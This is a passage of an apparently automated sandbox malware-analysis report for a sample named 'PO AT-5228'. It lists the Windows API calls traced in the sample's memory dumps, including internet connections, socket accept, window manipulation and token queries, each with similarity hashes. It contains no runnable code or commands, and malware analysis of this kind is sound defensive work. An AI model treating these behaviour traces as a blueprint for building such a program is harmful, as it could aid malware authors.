                                                                                          • Part of subcall function 00BA5F55: GetCurrentThreadId.KERNEL32 ref: 00BA5F76
                                                                                          • Part of subcall function 00BA5F55: AttachThreadInput.USER32(00000000,?,00BA781F), ref: 00BA5F7D
                                                                                        • GetCaretPos.USER32(?), ref: 00BC7CCA
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00BC7D03
                                                                                        • GetForegroundWindow.USER32 ref: 00BC7D09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 330303fc60c8e5d1a18b177c1086d3f1258e7672d076d873d752a4ba23c2d707
                                                                                        • Instruction ID: 03e11ed3d9fbea897a5fcd0c0505b7b1521e3ee6a12d68ed3d7cf016eb162906
                                                                                        • Opcode Fuzzy Hash: 330303fc60c8e5d1a18b177c1086d3f1258e7672d076d873d752a4ba23c2d707
                                                                                        • Instruction Fuzzy Hash: 0131F171900108AFDB11EFB9D8859EFBBFDEF54314B1084AAE819E7211DA759F058FA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • GetCursorPos.USER32(?), ref: 00BCF211
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BDE4C0,?,?,?,?,?), ref: 00BCF226
                                                                                        • GetCursorPos.USER32(?), ref: 00BCF270
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BDE4C0,?,?,?), ref: 00BCF2A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: 6e5b348377ee55ed12a450aa3d10f52275acff6446f9af38a734ef208f9f15b6
                                                                                        • Instruction ID: aff6359b80f5b1b35ac0e3fba52de53c4e87133fb2005f0b195148306495faf7
                                                                                        • Opcode Fuzzy Hash: 6e5b348377ee55ed12a450aa3d10f52275acff6446f9af38a734ef208f9f15b6
                                                                                        • Instruction Fuzzy Hash: 22215E39600018AFCB259F94D898FFE7BF6EB49720F0880E9F9154B2A1D7719A51DB50
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BB4358
                                                                                          • Part of subcall function 00BB43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BB4401
                                                                                          • Part of subcall function 00BB43E2: InternetCloseHandle.WININET(00000000), ref: 00BB449E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 1d52dabccaa3d7b1b50f187b0656b25e1a5a0b57e3e224ddf93d92adf80ccb6f
                                                                                        • Instruction ID: 9550aa90060e89835ed96d405c66172e6c1276d0d059c96ef29ef3fa8a1d1d96
                                                                                        • Opcode Fuzzy Hash: 1d52dabccaa3d7b1b50f187b0656b25e1a5a0b57e3e224ddf93d92adf80ccb6f
                                                                                        • Instruction Fuzzy Hash: 6E218E35200605BBEB169F609C80FBBB7E9FB48710F18406ABA159B652DBF1982197A4
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BC8AA6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC8AC0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BC8ACE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BC8ADC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 79bacdcdd6596523f01f9277e02f1139f2b4db5ce3d488b10e4793b634134c8a
                                                                                        • Instruction ID: 2aa52525045436ab6e246b0dfe20099bc8781f353aa649fece535a7a2b315486
                                                                                        • Opcode Fuzzy Hash: 79bacdcdd6596523f01f9277e02f1139f2b4db5ce3d488b10e4793b634134c8a
                                                                                        • Instruction Fuzzy Hash: 6B118131305511AFE705AB18DC45FBA77E9EF95320F144199F916CB2E1CFB4AD108794
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00BB8AE0
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00BB8AF2
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00BB8AFF
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8B16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        • Opcode ID: cca5ec6dbd3f9bf5d94af6ec3b78004b97cd936215218eff4597d49cc9d233d1
                                                                                        • Instruction ID: 5d4b889cb6e8d9bd626ea8661a8a7e0749245b36444a07b7e97e387acb8ef8a0
                                                                                        • Opcode Fuzzy Hash: cca5ec6dbd3f9bf5d94af6ec3b78004b97cd936215218eff4597d49cc9d233d1
                                                                                        • Instruction Fuzzy Hash: FE216671A001249FC7219F69C885ADE7BECEF5A350F0081A9F849DB251DBB4DE45CF90
                                                                                        APIs
                                                                                          • Part of subcall function 00BA1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?), ref: 00BA1E77
                                                                                          • Part of subcall function 00BA1E68: lstrcpyW.KERNEL32(00000000,?,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA1E9D
                                                                                          • Part of subcall function 00BA1E68: lstrcmpiW.KERNEL32(00000000,?,00BA0ABB,?,?,?,00BA187A,00000000,000000EF,00000119,?,?), ref: 00BA1ECE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0AD4
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0AFA
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BA187A,00000000,000000EF,00000119,?,?,00000000), ref: 00BA0B2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: 3a0c70e19b8401b0881c1f014671380bf186fe1a6422cb1dc76e1ce08ffea8fb
                                                                                        • Instruction ID: 543d3676b81d7c15c7944d671f95ffe4b2b56cc3e05b03d4c65c74278db4ca95
                                                                                        • Opcode Fuzzy Hash: 3a0c70e19b8401b0881c1f014671380bf186fe1a6422cb1dc76e1ce08ffea8fb
                                                                                        • Instruction Fuzzy Hash: 4F11E636214345AFDB25AF34DC45E7A77E9FF46310F8040AAF906CB250EB719851C7A1
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00B92FB5
                                                                                          • Part of subcall function 00B8395C: __FF_MSGBANNER.LIBCMT ref: 00B83973
                                                                                          • Part of subcall function 00B8395C: __NMSG_WRITE.LIBCMT ref: 00B8397A
                                                                                          • Part of subcall function 00B8395C: RtlAllocateHeap.NTDLL(01920000,00000000,00000001,00000001,00000000,?,?,00B7F507,?,0000000E), ref: 00B8399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: dd00fa22dc173d831a34f790b8633e91dbd6f71d8f00af4b233a29fc94c41f52
                                                                                        • Instruction ID: a05ebd67a631519378a088534af6fdbd8e437973c8aafc5315ff0db82cb46945
                                                                                        • Opcode Fuzzy Hash: dd00fa22dc173d831a34f790b8633e91dbd6f71d8f00af4b233a29fc94c41f52
                                                                                        • Instruction Fuzzy Hash: 0C119132949212ABDF313F74AC8576A3BD8EF14764F3449B5F8499B161DE70C940DB90
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BA05AC
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BA05C7
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BA05DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00BA0632
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                        • String ID:
                                                                                        • API String ID: 3137044355-0
                                                                                        • Opcode ID: 26d85176f19782d46854954cf64790e829fbc2c285084747b6a4f55fade12bec
                                                                                        • Instruction ID: 429977e8c627f67895286860dc24054459d0e238156cc92fc44f37b21d795542
                                                                                        • Opcode Fuzzy Hash: 26d85176f19782d46854954cf64790e829fbc2c285084747b6a4f55fade12bec
                                                                                        • Instruction Fuzzy Hash: C521BE71904209EFDB20AF98EDC8ADABBF8EF41308F0084A9E51697050DBB1EA54DF51
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BA6733
                                                                                        • _memset.LIBCMT ref: 00BA6754
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00BA67A6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA67AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: 6c5ee6e06f56f309ca55fcaddb855294371718775d329d7dff738a66727679a8
                                                                                        • Instruction ID: c1eb08f913eaae3567d3bd037ef2f53f0e1cd5120e4eb22c87e3b309d4c65a2d
                                                                                        • Opcode Fuzzy Hash: 6c5ee6e06f56f309ca55fcaddb855294371718775d329d7dff738a66727679a8
                                                                                        • Instruction Fuzzy Hash: 62110AB19012287AE72067A5AC8DFABBBBCEF45764F1041DAF904E71D0D6744E80CB64
                                                                                        APIs
                                                                                          • Part of subcall function 00B9AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B9AA79
                                                                                          • Part of subcall function 00B9AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B9AA83
                                                                                          • Part of subcall function 00B9AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B9AA92
                                                                                          • Part of subcall function 00B9AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B9AA99
                                                                                          • Part of subcall function 00B9AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9AAAF
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00B9ADE4,?,?), ref: 00B9B21B
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B9B227
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B9B22E
                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00B9B247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 4217664535-0
                                                                                        • Opcode ID: 8d92310b62e98384bd69f9475265374a759d0471238905386ad71e36874fbeea
                                                                                        • Instruction ID: 3d6d5bba76dc8193eb5922ffd8d72092f58f6b3fb88ca7394ae93ccce1fcc713
                                                                                        • Opcode Fuzzy Hash: 8d92310b62e98384bd69f9475265374a759d0471238905386ad71e36874fbeea
                                                                                        • Instruction Fuzzy Hash: 8D11C171A00205EFCF149F94ED94EAEBBE9EF85304F1480BDE9429B210D7B1AE44CB10
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00B9B498
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4AA
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4C0
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B9B4DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: debb5b297ca440cfb205bb922d56fdd35f3c53c78aea67b9fc9e8c1b906827a8
                                                                                        • Instruction ID: 9994aba2ba258158f1ef2fb2b9c20ae792b4a5f289387f8744a6db23b8a9fc54
                                                                                        • Opcode Fuzzy Hash: debb5b297ca440cfb205bb922d56fdd35f3c53c78aea67b9fc9e8c1b906827a8
                                                                                        • Instruction Fuzzy Hash: 4011367A900218BFDF11DBA8C981E9DBBB4FB08700F2040A1E604A7294D771AE10EB94
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B7B5A5
                                                                                        • GetClientRect.USER32(?,?), ref: 00BDE69A
                                                                                        • GetCursorPos.USER32(?), ref: 00BDE6A4
                                                                                        • ScreenToClient.USER32(?,?), ref: 00BDE6AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 0cbec2a0aed429e639fc40ae408239d9ea6857d251e64c1394f449d653db7f21
                                                                                        • Instruction ID: fbcc736864be27a211acc514c5dc3d1e7bac0cc358866918f7fedc94a4f24c83
                                                                                        • Opcode Fuzzy Hash: 0cbec2a0aed429e639fc40ae408239d9ea6857d251e64c1394f449d653db7f21
                                                                                        • Instruction Fuzzy Hash: 20112571900029BFCB14AF94D885EAE7BF8EB18304F004496F925AB140E770AA81CBA1
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BA7352
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00BA7385
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BA739B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BA73A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: 61505acd2890f0188bb706419ef683a90b3e916fd27c1c597310fa2934fd43f1
                                                                                        • Instruction ID: ee3fc413f4421b93a56f53a715e491abb4c1d3cd232209abed5376475049ad99
                                                                                        • Opcode Fuzzy Hash: 61505acd2890f0188bb706419ef683a90b3e916fd27c1c597310fa2934fd43f1
                                                                                        • Instruction Fuzzy Hash: ED110872A0C244EFCB019B68DC45B9E7BEDDB45310F144395F921E32A1DAB08D0187A5
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 7cadb5039f92e681a1e78af81e5eb5f74aa5b76e00dcf17ead0810f72b64f7d7
                                                                                        • Instruction ID: 6bb754cfbf1c85bdbd8e8f249b7df9f96931325396a2a18638e9a48423da9cfb
                                                                                        • Opcode Fuzzy Hash: 7cadb5039f92e681a1e78af81e5eb5f74aa5b76e00dcf17ead0810f72b64f7d7
                                                                                        • Instruction Fuzzy Hash: 0211C072101549BFEF124F90DC90EEABBB9FF083A5F448146FA2966150CB71DC61EBA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction ID: 7040dacb7870cfba3b4d7fa9deac4f1bec5bc77212e0008066222bbad6cc025f
                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction Fuzzy Hash: A1014B3204054EBBCF275E94DC51CEE3FA2FB18354B5984A5FE1859135D336CAB2AB81
                                                                                        APIs
                                                                                          • Part of subcall function 00B87A0D: __getptd_noexit.LIBCMT ref: 00B87A0E
                                                                                        • __lock.LIBCMT ref: 00B8748F
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B874AC
                                                                                        • _free.LIBCMT ref: 00B874BF
                                                                                        • InterlockedIncrement.KERNEL32(01932990), ref: 00B874D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
